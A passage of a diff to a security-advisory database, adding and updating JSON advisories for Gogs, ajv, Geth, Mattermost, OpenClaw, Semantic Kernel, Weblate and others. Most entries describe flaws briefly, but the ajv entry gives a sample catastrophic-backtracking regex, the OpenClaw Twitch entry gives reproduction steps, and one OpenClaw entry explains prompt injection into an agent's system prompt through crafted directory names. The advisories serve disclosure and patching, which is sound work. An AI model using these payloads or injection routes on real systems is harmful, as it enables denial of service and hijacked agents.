mechanism\n- **Delete default branch**: Can cause repository to become inaccessible (git clone/pull failures)\n- **Bypass code review**: After deleting protected branch, can push new branch bypassing Pull Request requirements\n- **Privilege escalation**: Writer permission users can perform operations that should only be allowed for Admins", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "gogs.io/gogs" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.14.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/gogs/gogs/security/advisories/GHSA-2c6v-8r3v-gh6p" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25232" + }, + { + "type": "WEB", + "url": "https://github.com/gogs/gogs/pull/8124" + }, + { + "type": "WEB", + "url": "https://github.com/gogs/gogs/commit/7b7e38c88007a7c482dbf31efff896185fd9b79c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gogs/gogs" + }, + { + "type": "WEB", + "url": "https://github.com/gogs/gogs/releases/tag/v0.14.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T18:43:00Z", + "nvd_published_at": "2026-02-19T07:17:45Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json new file mode 100644 index 0000000000000..d88bb33cb349a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2g4f-4pwh-qvx6/GHSA-2g4f-4pwh-qvx6.json @@ -0,0 +1,105 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2g4f-4pwh-qvx6", + "modified": "2026-02-23T22:40:29Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2025-69873" + ], + "summary": "ajv has ReDoS when using `$data` option", + "details": "ajv (Another JSON Schema Validator) through version 8.17.1 is vulnerable to Regular Expression Denial of Service (ReDoS) when the `$data` option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax (`$data` reference), which is passed directly to the JavaScript `RegExp()` constructor without validation. An attacker can inject a malicious regex pattern (e.g., `\\\"^(a|a)*$\\\"`) combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with `$data`: true for dynamic schema validation.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ajv" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0-alpha.0" + }, + { + "fixed": "8.18.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ajv" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.14.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/pull/2586" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/pull/2588" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/commit/720a23fa453ffae8340e92c9b0fe886c54cfe0d5" + }, + { + "type": "WEB", + "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ajv-validator/ajv" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.14.0" + }, + { + "type": "WEB", + "url": "https://github.com/ajv-validator/ajv/releases/tag/v8.18.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333", + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T16:38:57Z", + "nvd_published_at": "2026-02-11T19:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json new file mode 100644 index 0000000000000..8bb5175975be1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2gjw-fg97-vg3r/GHSA-2gjw-fg97-vg3r.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2gjw-fg97-vg3r", + "modified": "2026-02-20T16:46:27Z", + "published": "2026-02-18T22:35:15Z", + "aliases": [ + "CVE-2026-26314" + ], + "summary": "Go Ethereum affected by DoS via malicious p2p message", + "details": "### Impact\n\nA vulnerable node can be forced to shutdown/crash using a specially crafted message.\nMore details to be released later.\n\n### Patches\n\nThe problem is resolved in the v1.16.9 and v1.17.0 releases of Geth.\n\n### Credit\n\nThis issue was reported to the Ethereum Foundation Bug Bounty Program by Waleed Ahmed from vulsight.com", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/ethereum/go-ethereum" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.16.9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.16.8" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/security/advisories/GHSA-2gjw-fg97-vg3r" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26314" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/commit/895a8597cb16c02203e38707ed2d1da5c500fe60" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ethereum/go-ethereum" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/go-ethereum/releases/tag/v1.16.9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:35:15Z", + "nvd_published_at": "2026-02-19T22:16:46Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json b/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json new file mode 100644 index 0000000000000..fa79c68079351 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2phx-frhf-xr55/GHSA-2phx-frhf-xr55.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2phx-frhf-xr55", + "modified": "2026-02-19T19:34:32Z", + "published": "2026-02-16T12:30:24Z", + "aliases": [ + "CVE-2026-0997" + ], + "summary": "Mattermost Plugin Zoom allows any logged-in user to change Zoom meeting restrictions for arbitrary channels", + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 and Mattermost Plugin Zoom versions <=1.11.0 fail to validate the authenticated user when processing {{/plugins/zoom/api/v1/channel-preference}}, which allows any logged-in user to change Zoom meeting restrictions for arbitrary channels via crafted API requests.. Mattermost Advisory ID: MMSA-2025-00558", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-plugin-zoom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.11.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0997" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost-plugin-zoom/commit/a8b58c43625ab25746e451acc4f71515d52c8122" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost-plugin-zoom" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:34:32Z", + "nvd_published_at": "2026-02-16T10:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json new file mode 100644 index 0000000000000..a0a0c5b5f1d21 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-2qj5-gwg2-xwc4/GHSA-2qj5-gwg2-xwc4.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2qj5-gwg2-xwc4", + "modified": "2026-02-20T16:46:56Z", + "published": "2026-02-18T22:42:29Z", + "aliases": [ + "CVE-2026-27001" + ], + "summary": "OpenClaw: Unsanitized CWD path injection into LLM prompts", + "details": "## Overview\nOpenClaw embedded the current working directory (workspace path) into the agent system prompt without sanitization. If an attacker can cause OpenClaw to run inside a directory whose name contains control/format characters (for example newlines or Unicode bidi/zero-width markers), those characters could break the prompt structure and inject attacker-controlled instructions.\n\n## Impact\nPrompt injection may alter agent behavior and could lead to unintended tool use or disclosure of sensitive information.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Vulnerable versions: `< 2026.2.15` (latest published vulnerable version as of 2026-02-16: `2026.2.14`)\n- Patched versions: `>= 2026.2.15`\n\n## Fix\nThe workspace path is now sanitized before it is embedded into any LLM prompt output, stripping Unicode control/format characters and explicit line/paragraph separators. Workspace path resolution also applies the same sanitization as defense-in-depth.\n\n## Fix Commit(s)\n- `6254e96acf16e70ceccc8f9b2abecee44d606f79`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2qj5-gwg2-xwc4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27001" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/6254e96acf16e70ceccc8f9b2abecee44d606f79" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:42:29Z", + "nvd_published_at": "2026-02-20T00:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json index 906376b23efae..92c8917e68d26 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json +++ b/advisories/github-reviewed/2026/02/GHSA-2ww3-72rp-wpp4/GHSA-2ww3-72rp-wpp4.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-2ww3-72rp-wpp4", - "modified": "2026-02-06T21:43:53Z", + "modified": "2026-02-20T19:15:43Z", "published": "2026-02-06T18:37:24Z", "aliases": [ "CVE-2026-25592" ], "summary": "Semantic Kernel has Arbitrary File Write via AI Agent Function Calling in .NET SDK", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\nThe problem has been fixed in [Microsoft.SemanticKernel.Core version 1.70.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Core/1.70.0). Users should upgrade to version 1.70.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", + "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nAn Arbitrary File Write vulnerability has been identified in Microsoft's Semantic Kernel .NET SDK, specifically within the `SessionsPythonPlugin`.\nDevelopers who have built applications which include Microsoft's Semantic Kernel .NET SDK and are using the `SessionsPythonPlugin`\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nThe problem has been fixed in [Microsoft.SemanticKernel.Plugins.Core version 1.71.0](https://www.nuget.org/packages/Microsoft.SemanticKernel.Plugins.Core/1.71.0). Users should upgrade to version 1.71.0 or higher.\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nUsers can create a [Function Invocation Filter](https://learn.microsoft.com/en-us/semantic-kernel/concepts/enterprise-readiness/filters?pivots=programming-language-csharp#function-invocation-filter) which checks the arguments being passed to any calls to `DownloadFileAsync ` or `UploadFileAsync` and ensures the provided `localFilePath` is allow listed.\n\n### References\n_Are there any links users can visit to find out more?_\n- [Sample showing safe use of the CodeInterpreterPlugin](https://github.com/microsoft/semantic-kernel/blob/main/dotnet/samples/Demos/CodeInterpreterPlugin/Program.cs#L61-L64)\n- [PR to Add file upload security controls to SessionsPythonPlugin](https://github.com/microsoft/semantic-kernel/pull/13478/changes#diff-88d3cacba2bfa84eef8f2aa171b34f9940338cbb784a3ffc49f5fe3af1b8943d)", "severity": [ { "type": "CVSS_V3", @@ -17,8 +17,8 @@ "affected": [ { "package": { - "ecosystem": "NuGet", - "name": "Microsoft.SemanticKernel.Core" + "ecosystem": "PyPI", + "name": "semantic-kernel" }, "ranges": [ { @@ -28,7 +28,7 @@ "introduced": "0" }, { - "fixed": "1.70.0" + "fixed": "1.39.3" } ] } @@ -36,8 +36,8 @@ }, { "package": { - "ecosystem": "PyPI", - "name": "semantic-kernel" + "ecosystem": "NuGet", + "name": "Microsoft.SemanticKernel.Core" }, "ranges": [ { @@ -47,7 +47,7 @@ "introduced": "0" }, { - "fixed": "1.39.3" + "fixed": "1.71.0" } ] } diff --git a/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json b/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json index 624c28abfcc61..f8331a758a47e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json +++ b/advisories/github-reviewed/2026/02/GHSA-2xcx-75h9-vr9h/GHSA-2xcx-75h9-vr9h.json @@ -51,7 +51,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-522" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json b/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json similarity index 53% rename from advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json rename to advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json index 95e68291c6dcf..2dd1016e60662 100644 --- a/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json +++ b/advisories/github-reviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-2xf7-hmf6-p64j", - "modified": "2026-02-13T12:31:21Z", + "modified": "2026-02-13T20:55:54Z", "published": "2026-02-13T12:31:21Z", "aliases": [ "CVE-2026-20796" ], + "summary": "Mattermost doesn't properly validate channel membership at the time of data retrieval", "details": "Mattermost versions 10.11.x <= 10.11.9 fail to properly validate channel membership at the time of data retrieval which allows a deactivated user to learn team names they should not have access to via a race condition in the /common_teams API endpoint.. Mattermost Advisory ID: MMSA-2025-00549", "severity": [ { @@ -13,12 +14,39 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.11.0" + }, + { + "fixed": "10.11.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 10.11.9" + } + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20796" }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, { "type": "WEB", "url": "https://mattermost.com/security-updates" @@ -29,8 +57,8 @@ "CWE-367" ], "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-13T20:55:54Z", "nvd_published_at": "2026-02-13T11:16:10Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json b/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json new file mode 100644 index 0000000000000..b34cd5da7c006 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3288-p39f-rqpv/GHSA-3288-p39f-rqpv.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3288-p39f-rqpv", + "modified": "2026-02-19T15:17:41Z", + "published": "2026-02-19T15:17:41Z", + "aliases": [], + "summary": "Unsoundness in opt-in ARMv8 assembly backend for `keccak`", + "details": "### Summary\n\nThe `asm!` block enabled by the off-by-default `asm` feature, when enabled on ARMv8 targets, misspecified the operand\ntype for all of its operands, using `in` for pointers and values which were subsequently mutated by operations performed\nwithin the assembly block.\n\n### Impact\n\nIt's unclear what practical impact, if any, this actually had. Incorrect operand types are technically undefined\nbehavior, however changing them had no actual impact on the generated assembly for these targets. The possibility still\nexists that it may lead to potential memory safety or other issues on hypothetical future versions of rustc.\n\n### Mitigation\n\nThe operand types were changed from `in` to `inout`, and the impacted versions of the `keccak` crate were yanked.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "keccak" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.1.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/RustCrypto/sponges/pull/101" + }, + { + "type": "WEB", + "url": "https://github.com/RustCrypto/sponges/commit/7ac1920198ebb7d0192e6d2c3581e15b38a6e0e5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/RustCrypto/sponges" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2026-0012.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-758" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T15:17:41Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json b/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json new file mode 100644 index 0000000000000..e1ac8f6e24636 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33fm-6gp7-4p47/GHSA-33fm-6gp7-4p47.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33fm-6gp7-4p47", + "modified": "2026-02-19T20:30:31Z", + "published": "2026-02-17T16:37:55Z", + "aliases": [ + "CVE-2026-24126" + ], + "summary": "Weblate has an argument injection in management console", + "details": "### Impact\nThe SSH management console did not validate the passed input while adding the SSH host key, which could lead to an argument injection to `ssh-add`.\n\n### Patches\n* https://github.com/WeblateOrg/weblate/pull/17722\n\n### Workarounds\nProperly limit access to the management console.\n\n### References\nThis issue was reported to us by [alexb_616](https://hackerone.com/alexb_616) via HackerOne.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Weblate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.16.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/WeblateOrg/weblate/security/advisories/GHSA-33fm-6gp7-4p47" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24126" + }, + { + "type": "WEB", + "url": "https://github.com/WeblateOrg/weblate/pull/17722" + }, + { + "type": "WEB", + "url": "https://github.com/WeblateOrg/weblate/commit/78773cc141ce0a97900c11341e6cf856451395fd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/WeblateOrg/weblate" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-88" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T16:37:55Z", + "nvd_published_at": "2026-02-19T00:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json b/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json new file mode 100644 index 0000000000000..8fc9c6ffc6896 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33hq-fvwr-56pm/GHSA-33hq-fvwr-56pm.json @@ -0,0 +1,66 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33hq-fvwr-56pm", + "modified": "2026-02-19T20:29:30Z", + "published": "2026-02-19T20:29:30Z", + "aliases": [], + "summary": "devalue affected by CPU and memory amplification from sparse arrays", + "details": "Under certain circumstances, serializing sparse arrays using `uneval` or `stringify` could cause CPU and/or memory exhaustion. When this occurs on the server, it results in a DoS. This is extremely difficult to take advantage of in practice, as an attacker would have to manage to create a sparse array on the server — which is impossible in every mainstream wire format — and then that sparse array would have to be run through `uneval` or `stringify`.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "devalue" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.6.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.6.2" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/security/advisories/GHSA-33hq-fvwr-56pm" + }, + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/commit/819f1ac7475ab37547645cfb09bf2f678a799cf0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sveltejs/devalue" + }, + { + "type": "WEB", + "url": "https://github.com/sveltejs/devalue/releases/tag/v5.6.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:29:30Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json b/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json new file mode 100644 index 0000000000000..0f3179a684a60 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-33rq-m5x2-fvgf/GHSA-33rq-m5x2-fvgf.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33rq-m5x2-fvgf", + "modified": "2026-02-17T21:37:55Z", + "published": "2026-02-17T21:37:55Z", + "aliases": [], + "summary": "OpenClaw Twitch allowFrom is not enforced in optional plugin, unauthorized chat users can trigger agent pipeline", + "details": "### Summary\n\nIn the optional Twitch channel plugin (`extensions/twitch`), `allowFrom` is documented as a hard allowlist of Twitch user IDs, but it was not enforced as a hard gate. If `allowedRoles` is unset or empty, the access control path defaulted to allow, so any Twitch user who could mention the bot could reach the agent dispatch pipeline.\n\n**Scope note:** This only affects deployments that installed and enabled the Twitch plugin. Core OpenClaw installs that do not install/enable the Twitch plugin are not impacted.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `>= 2026.1.29, < 2026.2.1`\n- Fixed: `>= 2026.2.1`\n\n### Details\n\nAffected component: Twitch plugin access control (`extensions/twitch/src/access-control.ts`).\n\nProblematic logic in `checkTwitchAccessControl()`:\n\n- When `allowFrom` was configured, the code returned `allowed: true` for members but did not return `allowed: false` for non-members, so execution fell through.\n- If `allowedRoles` was unset or empty, the function returned `allowed: true` by default, even when `allowFrom` was configured.\n\n### Proof of Concept (PoC)\n\n1. Install and enable the Twitch plugin.\n2. Configure an `allowFrom` list, but do not set `allowedRoles` (or set it to an empty list).\n3. From a different Twitch account whose user ID is NOT in `allowFrom`, send a message that mentions the bot (for example `@ hello`).\n4. Observe the message is processed and can trigger agent dispatch/replies despite not being allowlisted.\n\n### Impact\n\nAuthorization bypass for operators who relied on `allowFrom` to restrict who can invoke the bot in Twitch chat. Depending on configuration (tools, routing, model costs), this could lead to unintended actions/responses and resource or cost exhaustion.\n\n### Fix Commit(s)\n\n- `8c7901c984866a776eb59662dc9d8b028de4f0d0`\n\n### Workaround\n\nUpgrade to `openclaw >= 2026.2.1`.\n\nThanks @MegaManSec (https://joshua.hu) of [AISLE Research Team](https://aisle.com/) for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.29" + }, + { + "fixed": "2026.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-33rq-m5x2-fvgf" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/8c7901c984866a776eb59662dc9d8b028de4f0d0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:37:55Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json new file mode 100644 index 0000000000000..d93d859f2120c --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-34p4-7w83-35g2/GHSA-34p4-7w83-35g2.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34p4-7w83-35g2", + "modified": "2026-02-23T22:27:29Z", + "published": "2026-02-19T20:31:07Z", + "aliases": [ + "CVE-2026-27198" + ], + "summary": "Formwork Improperly Managed Privileges in User creation", + "details": "### Summary\n\nThe application fails to properly enforce role-based authorization during account creation. Although the system validates that the specified role exists, it does not verify whether the current user has sufficient privileges to assign highly privileged roles such as admin. As a result, an authenticated user with the 